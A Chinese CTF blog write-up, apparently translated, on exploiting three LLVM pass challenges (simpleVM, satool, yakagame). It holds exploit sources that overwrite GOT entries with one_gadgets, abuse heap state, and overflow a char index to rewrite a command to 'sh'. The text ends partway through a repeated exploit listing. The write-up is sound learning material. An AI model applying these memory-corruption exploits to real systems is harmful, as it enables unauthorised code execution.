Getting started with LLVM pass pwn

Published: 2023-07-26 11:26:16  Author: 何思泊河

For someone who has never learned C++ this is quite unfriendly; it felt like going back to when I was learning Java (my Java is terrible): all the packages, functions, implementation classes, iterators, red-black trees and so on. It looks like I need to set aside some time to learn C++.

Environment

Honestly, setting up this environment took two days. I kept getting `Error opening 'LLVMHello.so': LLVMHello.so: cannot open shared object file: No such file or directory`. The fix is either to pass the .so by absolute path, or to set the environment variable in .bashrc or .zshrc: `export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:.`. That variable has a side effect, though: the dynamic loader searches LD_LIBRARY_PATH before the system library directories, so if the current directory contains any glibc .so (for example a libc.so.6 shipped with a challenge), it gets loaded instead of the system one, every command crashes with `Segmentation fault (core dumped)`, and basically nothing works. This is a nasty pitfall; I almost thought my Ubuntu was done for. There is no need to worry, though: wrap the variable in a command that can be switched on and off by hand.

```
# single quotes: $LD_LIBRARY_PATH is expanded when the alias runs, not when it is defined
alias llvm-ld='export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:.'
alias llvm-rd='unset LD_LIBRARY_PATH'
```

With these two aliases the current directory is only on the library path while you need it.

Some commands

`clang-8 -emit-llvm -S exp.c -o exp.ll` compiles the C source into LLVM IR (.ll)

`./opt-8 -load ./VMPass.so -VMPass ./exp.ll` loads the pass and runs it on the .ll file (this is how the attack is delivered)

`set args -load VMPass.so -VMPass exp.ll` sets the program arguments in gdb when debugging

`llvm::Pass::preparePassManager` is the breakpoint to set when starting to debug

How to find the pass name: press alt+t (text search) and search for `namespace`

The opcode numbers for instructions can be found in /usr/include/llvm-xx/llvm/IR/Instruction.def

2021 红帽杯 (Red Hat Cup): simpleVM

Program analysis

Using alt+t we find that the overridden runOnFunction is sub_6830.

This part checks whether the function's name is o0o0o0o0.

Entering sub_6AC0: this part iterates over the function's basic blocks.

Entering sub_6B80: this is where each basic block's instructions are analysed and their functionality implemented.

This part is rather long, so I won't analyse it in detail; it essentially implements a VM.

The key class is the abstract class llvm::CallBase; once you know the methods below you can basically follow the program's flow.

  1. `Function *getCalledFunction() const`: returns a pointer to the called function. If the call is a direct call (CallInst) and the callee is known, it returns the callee's Function pointer; otherwise it returns nullptr.
  2. `bool isIndirectCall() const`: checks whether the call is indirect. For an indirect call the target function is decided dynamically at run time rather than at compile time.
  3. `Value *getCalledValue() const`: returns the called value. For a direct call this is the callee function pointer; for an indirect call it is the value used to compute the target at run time.
  4. `unsigned getNumArgOperands() const`: returns the number of arguments of the call instruction.
  5. `Value *getArgOperand(unsigned i) const`: returns the i-th argument of the call instruction.
  6. `void setArgOperand(unsigned i, Value *val)`: sets the i-th argument of the call instruction to val.
  7. `OperandBundleUse getOperandBundle(StringRef Name) const`: returns the operand bundle with the given name. An operand bundle is a group of operands used to pass extra information.
  8. `void addOperandBundleUse(OperandBundleUse Bundle)`: adds an operand bundle to the call instruction.

The vulnerability is in load and store: these two functions give arbitrary address read and write.

The exploit overwrites the GOT entry of llvm::legacy::PassManager::~PassManager(). I saw many people overwrite free's GOT entry, but that did not work for me; then I found that winmt's approach works: overwrite the GOT entry of llvm::legacy::PassManager::~PassManager() with a one_gadget.

llvm::legacy::PassManager::~PassManager() is called automatically when the lifetime of an llvm::legacy::PassManager object ends, to clean up and release resources. During destruction it releases all the Pass objects owned by the pass manager, ensuring resources are freed correctly.

Debugging process

`add(1, 0x77E100);`

Effect: writes the value into register 1 as the target address.

`load(1);`

Effect: loads the value at the address held in register 1 into register 2.

`min(2, 0x9a6d0);`

Effect: subtracts 0x9a6d0 (free's offset in libc) from the real address of free.

`add(2, 0xe3afe);`

Effect: yields the real address of the one_gadget.

`add(1, 0x870);`

0x870 is the distance from free's GOT entry to llvm::legacy::PassManager::~PassManager()@got.plt.

`store(1);`

Effect: overwrites the value in llvm::legacy::PassManager::~PassManager()@got.plt with the one_gadget.

exp

```
// clang-8 -emit-llvm -S exp.c -o exp.ll
void add(int num, long long val);
void min(int num, long long val);
void load(int num);
void store(int num);

void o0o0o0o0()
{
    add(1, 0x77E100);   // got
    load(1);
    min(2, 0x9a6d0);    // free offset
    add(2, 0xe3afe);    // onegadget
    add(1, 0x870);
    store(1);
}
// ./opt-8 -load ./VMPass.so -VMPass ./exp.ll
```

CISCN-2021 satool

Program analysis

Again, first find the overridden runOnFunction; since the comparison is little-endian, the function name should be B4ckDo0r.

The main functions are save, takeaway, stealkey, fakekey and run, but only save, stealkey, fakekey and run are used.

save

Its main effect is to allocate a 0x20 chunk; it takes two parameters.

stealkey

Effect: copies the value in the allocated chunk into key.

fakekey

Effect: adds fakekey's parameter to the number stored in the first eight bytes of the chunk and writes the result back into the chunk.

run

Executes the data in the chunk.

Exploitation approach

Since run is the vulnerability, I try to get a one_gadget into the chunk.

Since there is a heap, let's look at the state of the bins at the beginning.

We can see that the second chunk allocation comes from the unsorted bin. Combined with what stealkey and fakekey do, we just need the first parameter of the second save to be empty; then stealkey puts (main_arena+96) into key, and in fakekey, with the offset calculated correctly, we can put a one_gadget into the chunk.

exp

```
void save(char *a, char *b);
void stealkey();
void fakekey(long long x);
void run();
void B4ckDo0r()
{
	save("trunk", "trunk");
	save("", "trunk");
	stealkey();
	fakekey(-0x1ecbf0+0xe3afe);
	run();
}
```

强网杯 (QWB) 2022: yakagame

Program analysis

In this challenge the overridden runOnFunction is sub_C880, and the pass name is ayaka.

From the analysis, this challenge was clearly written by a Genshin Impact player.

fight function

It seems to be a process of attacking a boss: score is obtained from the difference between the damage and the boss's HP, and the condition is that score is greater than 0x12345678.

The assignment to score is `v53 = weaponlist[v54]; *score = v53 - boss;`, but reaching that value directly is obviously impossible, because the weaponlist array is of type char.

merge (irrelevant)

Adds one weapon's damage to another weapon.

destroy (irrelevant)

Sets the chosen weapon's damage to zero.

upgrade (irrelevant)

Adds a value to the damage of every weapon.

Four operations on cmd

cmd can be modified by addition, subtraction and XOR, turning the original bytes 0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68, 0x66 into the ASCII of `cat flag`.

else (very important)

Since I had never studied C++, and this part mixes red-black trees and iterators in a series of operations, I basically did not understand it while analysing; it took a long time of debugging to work out the rough flow (my wording may be imprecise, apologies).

It maps every function that is not one of the above, together with its argument, as key/value pairs. On the first occurrence of a name the branch `if ( (std::operator==<char>(v22, v58) & 1) != 0 )` is not entered; only when the same function name appears a second time is it entered. Moreover, in `weaponlist[v33] = *(_BYTE *)(v24 + 0x20);`, v24 corresponds to the argument from the function's first occurrence; the argument of the second occurrence has no effect. This assignment has a vulnerability: v33 is of type char, and cmd and score sit right above the weaponlist array, so through a char integer overflow we can modify score and cmd.
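To make the char-index bug concrete, here is an added C model of the layout described above (my constructed example, not the challenge's code: the offsets, the 256-slot count and the `set_weapon_*` names are assumptions). It puts `cmd` and `score` just before `weaponlist[]`, shows how a slot number above 127 wraps to a negative index in the vulnerable store, and places the bounds-checked store beside it:

```c
#include <stdio.h>
#include <string.h>

/* Constructed model of the yakagame layout: score and cmd live in the bytes
 * just before weaponlist[], as the write-up describes. The offsets and the
 * slot count are assumptions of this model; the page does not give them. */
#define SCORE_OFF      0      /* 8-byte score */
#define CMD_OFF        8      /* 8-byte command string */
#define WEAPONLIST_OFF 32     /* weaponlist[] starts here */
#define WEAPON_COUNT   256    /* assumed number of weapon slots */
#define MEM_SIZE       (WEAPONLIST_OFF + WEAPON_COUNT)

struct game {
    unsigned char mem[MEM_SIZE];
};

void game_init(struct game *g, const char *cmd) {
    memset(g->mem, 0, sizeof g->mem);
    strncpy((char *)g->mem + CMD_OFF, cmd, 8);
}

/* Vulnerable: mirrors `weaponlist[v33] = *(_BYTE *)(v24 + 0x20);` with v33 a
 * char. Slot 232 becomes (signed char)232 == -24, so the store lands 24 bytes
 * before the array, inside cmd. `char` is signed on x86-64 Linux; we spell
 * `signed char` so the model behaves the same on every platform. */
void set_weapon_vuln(struct game *g, int slot, unsigned char dmg) {
    signed char idx = (signed char)slot;     /* silent truncation */
    g->mem[WEAPONLIST_OFF + idx] = dmg;      /* idx may be negative */
}

/* Hardened: keep the index in a wide type and bounds-check before indexing.
 * Returns 0 on success, -1 if the slot is rejected. */
int set_weapon_safe(struct game *g, int slot, unsigned char dmg) {
    if (slot < 0 || slot >= WEAPON_COUNT)
        return -1;
    g->mem[WEAPONLIST_OFF + (size_t)slot] = dmg;
    return 0;
}

int cmd_equals(const struct game *g, const char *expected) {
    return memcmp(g->mem + CMD_OFF, expected, strlen(expected)) == 0;
}

unsigned char weapon_at(const struct game *g, int slot) {
    return g->mem[WEAPONLIST_OFF + slot];
}

/* Two slot numbers that wrap to -24 and -23: the writes hit cmd[0..1].
 * Returns 1 if cmd was clobbered. */
int scenario_vuln(void) {
    struct game g;
    game_init(&g, "echo hi");
    set_weapon_vuln(&g, 232, 'A');
    set_weapon_vuln(&g, 233, 'B');
    return cmd_equals(&g, "ABho hi");
}

/* Same slots through the checked path: cmd stays intact, the bytes go to
 * weaponlist[232..233], and out-of-range slots are rejected.
 * Returns 1 if all of that holds. */
int scenario_safe(void) {
    struct game g;
    game_init(&g, "echo hi");
    int ok = set_weapon_safe(&g, 232, 'A') == 0 && set_weapon_safe(&g, 233, 'B') == 0;
    ok = ok && cmd_equals(&g, "echo hi") && weapon_at(&g, 232) == 'A' && weapon_at(&g, 233) == 'B';
    ok = ok && set_weapon_safe(&g, 300, 'C') == -1 && set_weapon_safe(&g, -1, 'C') == -1;
    return ok;
}

int main(void) {
    printf("vulnerable path clobbers cmd: %s\n", scenario_vuln() ? "yes" : "no");
    printf("hardened path keeps cmd intact: %s\n", scenario_safe() ? "yes" : "no");
    return 0;
}
```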

exp

There are actually two approaches: one uses the four operations provided to obtain `cat flag`; the other directly modifies cmd so that it points to `sh`.

Approach 1: directly modify cmd

void fight(int weapon){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
    trunk000(0);
    trunk001(0);
    trunk002(0);
    trunk003(0);
    trunk004(0);
    trunk005(0);
    trunk006(0);
    trunk007(0);
    trunk008(0);
    trunk009(0);
    trunk010(0);
    trunk011(0);
    trunk012(0);
    trunk013(0);
    trunk014(0);
    trunk015(0);
    trunk016(0);
    trunk017(0);
    trunk018(0);
    trunk019(0);
    trunk020(0);
    trunk021(0);
    trunk022(0);
    trunk023(0);
    trunk024(0);
    trunk025(0);
    trunk026(0);
    trunk027(0);
    trunk028(0);
    trunk029(0);
    trunk030(0);
    trunk031(0);
    trunk032(0);
    trunk033(0);
    trunk034(0);
    trunk035(0);
    trunk036(0);
    trunk037(0);
    trunk038(0);
    trunk039(0);
    trunk040(0);
    trunk041(0);
    trunk042(0);
    trunk043(0);
    trunk044(0);
    trunk045(0);
    trunk046(0);
    trunk047(0);
    trunk048(0);
    trunk049(0);
    trunk050(0);
    trunk051(0);
    trunk052(0);
    trunk053(0);
    trunk054(0);
    trunk055(0);
    trunk056(0);
    trunk057(0);
    trunk058(0);
    trunk059(0);
    trunk060(0);
    trunk061(0);
    trunk062(0);
    trunk063(0);
    trunk064(0);
    trunk065(0);
    trunk066(0);
    trunk067(0);
    trunk068(0);
    trunk069(0);
    trunk070(0);
    trunk071(0);
    trunk072(0);
    trunk073(0);
    trunk074(0);
    trunk075(0);
    trunk076(0);
    trunk077(0);
    trunk078(0);
    trunk079(0);
    trunk080(0);
    trunk081(0);
    trunk082(0);
    trunk083(0);
    trunk084(0);
    trunk085(0);
    trunk086(0);
    trunk087(0);
    trunk088(0);
    trunk089(0);
    trunk090(0);
    trunk091(0);
    trunk092(0);
    trunk093(0);
    trunk094(0);
    trunk095(0);
    trunk096(0);
    trunk097(0);
    trunk098(0);
    trunk099(0);
    trunk100(0);
    trunk101(0);
    trunk102(0);
    trunk103(0);
    trunk104(0);
    trunk105(0);
    trunk106(0);
    trunk107(0);
    trunk108(0);
    trunk109(0);
    trunk110(0);
    trunk111(0);
    trunk112(0);
    trunk113(0);
    trunk114(0);
    trunk115(0);
    trunk116(0);
    trunk117(0);
    trunk118(0);
    trunk119(0);
    trunk120(0);
    trunk121(0);
    trunk122(0);
    trunk123(0);
    trunk124(0);
    trunk125(0);
    trunk126(0);
    trunk127(0);
    trunk128(0);
    trunk129(0);
    trunk130(0);
    trunk131(0);
    trunk132(0);
    trunk133(0);
    trunk134(0);
    trunk135(0);
    trunk136(0);
    trunk137(0);
    trunk138(0);
    trunk139(0);
    trunk140(0);
    trunk141(0);
    trunk142(0);
    trunk143(0);
    trunk144(0);
    trunk145(0);
    trunk146(0);
    trunk147(0);
    trunk148(0);
    trunk149(0);
    trunk150(0);
    trunk151(0);
    trunk152(0);
    trunk153(0);
    trunk154(0);
    trunk155(0);
    trunk156(0);
    trunk157(0);
    trunk158(0);
    trunk159(0);
    trunk160(0);
    trunk161(0);
    trunk162(0);
    trunk163(0);
    trunk164(0);
    trunk165(0);
    trunk166(0);
    trunk167(0);
    trunk168(0);
    trunk169(0);
    trunk170(0);
    trunk171(0);
    trunk172(0);
    trunk173(0);
    trunk174(0);
    trunk175(0);
    trunk176(0);
    trunk177(0);
    trunk178(0);
    trunk179(0);
    trunk180(0);
    trunk181(0);
    trunk182(0);
    trunk183(0);
    trunk184(0);
    trunk185(0);
    trunk186(0);
    trunk187(0);
    trunk188(0);
    trunk189(0);
    trunk190(0);
    trunk191(0);
    trunk192(0);
    trunk193(0);
    trunk194(0);
    trunk195(0);
    trunk196(0);
    trunk197(0);
    trunk198(0);
    trunk199(0);
    trunk200(0);
    trunk201(0);
    trunk202(0);
    trunk203(0);
    trunk204(0);
    trunk205(0);
    trunk206(0);
    trunk207(0);
    trunk208(0);
    trunk209(0);
    trunk210(0);
    trunk211(0);
    trunk212(0);
    trunk213(0);
    trunk214(0);
    trunk215(0);
    trunk216(0);
    trunk217(0);
    trunk218(0);
    trunk219(0);
    trunk220(0);
    trunk221(0);
    trunk222(0);
    trunk223(0);
    trunk224(0);
    trunk225(0);
    trunk226(0);
    trunk227(0);
    trunk228(0);
    trunk229(0);
    trunk230(0);
    trunk231(0);
    // modify cmd: 0x6EFDAD -> sh

    trunk232(0xad);
    trunk233(0xfd);
    trunk234(0x6e);
    trunk235(0);
    
    trunk236(0);
    trunk237(0);
    trunk238(0);
    trunk239(0);
    trunk240(0);
    // modify score
    trunk241(0);
    trunk242(0x40);
    trunk243(0);
    trunk244(0);
    
    trunk245(0);
    trunk246(0);
    trunk247(0);
    trunk248(0);
    trunk249(0);
    trunk250(0);
    trunk251(0);
    trunk252(0);
    trunk253(0);
    trunk254(0);
    trunk255(0);
    
    
    trunk232(0xad);
    trunk233(0xfd);
    trunk234(0x6e);
    trunk235(0);
    
    
    trunk241(0);
    trunk242(0);
    trunk243(0);
    trunk244(0);
        
    fight(0);
    
}

Approach 2

Transform 0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68 through the operations into 0x63 0x61 0x74 0x20 0x66 0x6C 0x61 0x67.

This noob planned to write a brute-force script myself, but it didn't work out.

I saw that C0Lin obtained it with the following sequence:

```
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
guobapenhuo();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
```

void fight(int weapon){return;}
void wuxiangdeyidao(){return;}
void zhanjinniuza(){return;}
void guobapenhuo(){return;}
void tiandongwanxiang(){return;}
void upgrade(int val){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
    trunk000(0);
    trunk001(0);
    trunk002(0);
    trunk003(0);
    trunk004(0);
    trunk005(0);
    trunk006(0);
    trunk007(0);
    trunk008(0);
    trunk009(0);
    trunk010(0);
    trunk011(0);
    trunk012(0);
    trunk013(0);
    trunk014(0);
    trunk015(0);
    trunk016(0);
    trunk017(0);
    trunk018(0);
    trunk019(0);
    trunk020(0);
    trunk021(0);
    trunk022(0);
    trunk023(0);
    trunk024(0);
    trunk025(0);
    trunk026(0);
    trunk027(0);
    trunk028(0);
    trunk029(0);
    trunk030(0);
    trunk031(0);
    trunk032(0);
    trunk033(0);
    trunk034(0);
    trunk035(0);
    trunk036(0);
    trunk037(0);
    trunk038(0);
    trunk039(0);
    trunk040(0);
    trunk041(0);
    trunk042(0);
    trunk043(0);
    trunk044(0);
    trunk045(0);
    trunk046(0);
    trunk047(0);
    trunk048(0);
    trunk049(0);
    trunk050(0);
    trunk051(0);
    trunk052(0);
    trunk053(0);
    trunk054(0);
    trunk055(0);
    trunk056(0);
    trunk057(0);
    trunk058(0);
    trunk059(0);
    trunk060(0);
    trunk061(0);
